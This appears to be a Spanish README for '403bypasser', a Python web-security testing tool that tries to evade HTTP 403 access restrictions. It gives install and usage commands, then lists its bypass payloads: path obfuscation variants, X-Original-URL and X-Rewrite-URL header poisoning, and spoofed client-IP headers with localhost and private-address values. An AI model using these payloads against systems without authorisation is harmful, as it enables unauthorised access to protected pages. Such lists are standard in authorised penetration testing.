
Automatiza técnicas de bypass de control de acceso HTTP 403 mediante manipulación de encabezados, ofuscación de rutas y conversión de métodos HTTP para pruebas de seguridad en aplicaciones web.

403bypasser automatiza las técnicas utilizadas para eludir las restricciones de control de acceso en páginas objetivo. Esta herramienta continuará en desarrollo, está abierta a contribuciones.
403bypasser automatiza las técnicas utilizadas para eludir las restricciones de control de acceso en páginas objetivo. 403bypasser continuará mejorándose y está abierto a contribuciones.
git clone https://github.com/yunemse48/403bypasser.gitpip install -r requirements.txtArgumentos:
| Argumento | Descripción | Ejemplos | Nota |
|---|---|---|---|
| -u | URL única para escanear | http://ejemplo.com o http://ejemplo.com/ | Todos estos ejemplos de uso se interpretan de la misma manera |
| -U | ruta a una lista de URLs | ./urllist.txt, ../../urllist.txt, etc. | Solo proporciona la ruta donde se encuentra el archivo :) |
| -d | directorio único para escanear | admin o /admin o admin/ o /admin/ | Todos estos ejemplos de uso se interpretan de la misma manera |
| -D | ruta a una lista de directorios | ./dirlist.txt, ../../dirlist.txt, etc. | Solo proporciona la ruta donde se encuentra el archivo :) |
Uso 1: python3 403bypasser.py -u https://ejemplo.com -d /secreto
Uso 2: python3 403bypasser.py -u https://ejemplo.com -D dirlist.txt
Uso 3: python3 403bypasser.py -U urllist.txt -d /secreto
Uso 4: python3 403bypasser.py -U urllist.txt -D dirlist.txt
NOTA IMPORTANTE: Todos los siguientes se interpretan igual. Por lo tanto, usar un patrón u otro es solo cuestión de preferencia.
python3 403bypasser.py -u https://ejemplo.com -d secretopython3 403bypasser.py -u https://ejemplo.com -d /secretopython3 403bypasser.py -u https://ejemplo.com -d /secreto/python3 403bypasser.py -u https://ejemplo.com -d secreto/python3 403bypasser.py -u https://ejemplo.com/ -d secretoDado que Python es un lenguaje multiplataforma, se puede ejecutar este programa en diferentes sistemas operativos.
La salida del programa se guarda (en el directorio actual) en un archivo con el nombre del dominio proporcionado como entrada.
Por ejemplo:
Si se ejecuta python3 403bypasser.py -u https://ejemplo.com -d /secreto, la salida se guarda en ejemplo.txt en el directorio actual.
Cambios en v2.0: Se han realizado cambios considerables en esta versión. El proyecto se ha migrado completamente de Bash a Python 3. Se han añadido técnicas nuevas y variadas.
Cambios en v1.1: Ahora es posible pasar archivos (listas) a 403bypasser como entrada mediante argumentos. Además, se añadieron dos casos de prueba más:
envenenamiento con 1) cabeceras X-Original-URL y 2) X-Rewrite-URL.
/%2e/secreto/secreto//secreto..;//secreto/..;//secreto%20/secreto%09/secreto%00/secreto.json/secreto.css/secreto.html/secreto?/secreto??/secreto???/secreto?testparam/secreto#/secreto#test/secreto/.//secreto///./secreto/./X-Original-URL: /secretoX-Rewrite-URL: /secretoCabeceras:
X-Custom-IP-AuthorizationX-Forwarded-ForX-Forward-ForX-Remote-IPX-Originating-IPX-Remote-AddrX-Client-IPX-Real-IPValores:
localhostlocalhost:80localhost:443127.0.0.1127.0.0.1:80127.0.0.1:44321307064330x7F0000010177.0000.0000.00010127.110.0.0.010.0.0.1172.16.0.0172.16.0.1192.168.1.0192.168.1.1